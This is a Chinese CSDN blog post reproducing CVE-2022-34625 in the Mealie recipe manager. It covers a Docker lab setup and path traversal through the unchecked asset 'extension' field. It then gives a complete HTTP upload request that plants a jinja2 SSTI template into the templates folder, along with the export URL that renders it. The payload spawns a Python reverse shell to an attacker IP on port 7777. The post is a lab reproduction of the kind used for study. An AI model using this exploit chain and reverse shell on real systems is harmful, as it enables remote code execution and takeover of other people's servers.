CVE-2022-34625 mealie jinja2 SSTI注入

已于 2023-12-21 10:55:09 修改
阅读量368 收藏 7
点赞数 8
分类专栏: 漏洞复现 文章标签: python mealie jinja2 SSTI注入 web安全 漏洞复现
于 2023-12-21 10:52:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mirocky/article/details/135125309
版权

安装

官方指导:https://docs.mealie.io/documentation/getting-started/install/

docker search mealie
docker pull hkotel/mealie
docker run -p 9925:80 -v `pwd`:'/app/data/' -d hkotel/mealie:latest

记得-d使其在后台运行,否则主机命令行会一直被回显霸占,并且开不了新的终端
在这里插入图片描述
登陆时注意是http协议即可
在这里插入图片描述

透过其他本地虚机也可访问
在这里插入图片描述
最终由ubuntu担任服务器,kali担任攻击角色进行模拟

文件任意上传

mealie提供了文件上传的api,并且没有做检测

点击右下角的NEW
在这里插入图片描述
在上传食谱时,首先需要上传一张图,填写固定信息,使后台开出一个新的以食谱名为文件夹名的文件夹
在这里插入图片描述
在这里插入图片描述
编辑图片信息,左下角这里有一个上传asset,是直接以FILE做类,不做检查
在这里插入图片描述
简简单单验个包
在这里插入图片描述
这个函数出现的为name和extension参数,根据源码
https://github.com/hay-kot/mealie/blob/v1.0.0beta-3/mealie/routes/recipe/recipe_crud_routes.py
在这里插入图片描述
此处使用了slugify函数对name进行了处理,slugify函数主要作用为对敏感字符的过滤,但是没有对extension进行处理,因此直接对上传路径进行绕过


name填写为$
extension转换为./…/…/…/…/…/tmp/pwn
根据源码处理,会变为$…/…/…/…/…/…/tmp/pwn
在这里插入图片描述
在服务器上查询,确实上传成功
在这里插入图片描述
根据这一原理可以实现文件任意上传

模板注入

mealie支持jinja2,jinja2是个广泛使用的典型的MVC框架,并且有着最经典的SSTI注入漏洞,即在html页面中的{{变量}}如果是指向python类中的函数则会进行执行,故本案方法为写一个带有SSTI的html打到网站架构下的Templates下,并且使用mealie所提供的系统API进行调用,即可完成攻击
在这里插入图片描述

Payload:

POST /api/recipes/myrecipe/assets HTTP/1.1
Host: 192.168.92.162:9925
Content-Length: 528
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJjaGFuZ2VtZUBlbWFpbC5jb20iLCJleHAiOjE2NjEzMzM4Njd9.ygnYbd00IITzRuirsNAVzCEoL7KYbhUGuYjMz5UmdZ0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYi9znDeQteQu4H7C
Origin: http://192.168.92.162:9925
Referer: http://192.168.92.162:9925/recipe/myrecipe
Accept-Encoding: gzip, deflate
Connection: close

------WebKitFormBoundaryYi9znDeQteQu4H7C
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('python3 -c \'import os,pty,socket;s=socket.socket();s.connect(("192.168.92.128",7777));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")\'').read()  }}
------WebKitFormBoundaryYi9znDeQteQu4H7C
Content-Disposition: form-data; name="extension"

./../../../../../../../app/data/templates/pwn.html
------WebKitFormBoundaryYi9znDeQteQu4H7C
Content-Disposition: form-data; name="name"

$
------WebKitFormBoundaryYi9znDeQteQu4H7C
Content-Disposition: form-data; name="icon"

mdi-file
------WebKitFormBoundaryYi9znDeQteQu4H7C--

http://192.168.92.162:9925/api/recipes/myrecipe/exports/?template_name=pwn.html
在这里插入图片描述

参考

https://0xbruno.netlify.app/posts/research/mealie/cve-2022-34625/
https://gainsec.com/2022/08/02/cve-2022-34625-ssti-rce-mealie/

连人
关注
专栏目录
CVE-2022-22916
LiBai'S BLOG
05-24 2万+
CVE-2022-22916 CVE-2022-22916,O2OA RCE 远程命令执行 O2OA RCE 远程命令执行(CVE-2022-22916) O2OA是一个基于J2EE分布式架构,集成移动办公、智能办公,支持私有化部署,自适应负载能力的,能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。 通过 /x_program_center/jaxrs/invoke 发现 O2OA v6.4.7 包含一个远程代码执行 (RCE) 漏洞。 第一步: 登
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22954 VMware Workspace ONE Access SSTI RCE 漏洞分析
wangluo12138的博客
02-02 774
CVE-2022-22954 VMware Workspace ONE Access SSTI RCE 漏洞分析
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 2368
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XXE漏洞获取root私钥
Zyu0
12-02 1460
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XML外部实体(XXE)注入提权
从ofcms的模板注入漏洞CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 1763
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
VMware Workspace ONE Access SSTI 漏洞复现(CVE-2022-22954)
xiaobai_20190815的博客
05-17 1371
一、漏洞描述 VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。 二、影响版本 Linux Linux Kernel * * * Vmware Identity Manager 3.3.3 * * * Vmware Identity Manager 3.3.4 * * * Vmware Identity Manager 3.3.5 * * * Vm
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 616
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
Python精选200Tips:171-175
AnFany
09-26 1076
Python深度学习的项目
ubuntu安装libtorch
meng_152634的博客
09-25 708
nouveau是由第三方为NVIDIA显卡开发的一个开源3D驱动,ubuntu默认集成了nouveau驱动,安装NVIDIA驱动前必须禁用系统自带的显卡驱动nouveau,否则安装NVIDIA驱动时会报错。,一定要确定好安装的CUDA版本是否支持显卡的算力,否则安装成功也无法使用GPU加速。如果cmake版本低于3.18,会出现下面的报错,这是由于低于3.18的cmake不支持CUDA17的编译,需要更新cmake版本。因为安装的CUDA版本为12.1,这里选择最新版的CUDNN 9.4.0进行安装。
Python 高阶内容:套娃式装饰器巧妙为函数增加功能
敲代码别忘了喝上一杯凉白开。
09-23 576
装饰器是 Python 中一种非常强大且灵活的工具,能够在不修改函数本身的情况下,为函数增加额外的功能。本文介绍了装饰器的基本概念及应用,通过实例演示如何在函数执行前后添加额外操作,如鉴权、数据验证等,类似“套娃”般层层嵌套。文章还通过代码示例展示了如何定义和使用装饰器,以及如何将装饰器与实际业务逻辑结合,实现灵活的功能扩展。这种设计模式不仅可以提升代码的可读性和可维护性,还可以有效减少代码的冗余。掌握装饰器的用法,将为你的 Python 编程技巧增添更多亮点。
Java函数式接口日常使用
weng74的博客
09-24 472
Java 8 中函数接口使用到了业务开发中,方法灵活性和可复用性得到了很大的提升,方便业务的开发,下面来看看具体使用场景
numpy is not available
最新发布
xfsong2012的博客
09-27 212
在测试第一个程序的时候,出现Numpy is not available的错误,根据。安装的时候,安装的是最新版的numpy,检查numpy的版本为2.1.1版。我的pytorch版本为1.12.1,选择不高于1.21的版本即可。的办法知道是因为numpy与pytorch版本不一致造成的。2、安装需要的numpy版本,比如1.21版。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值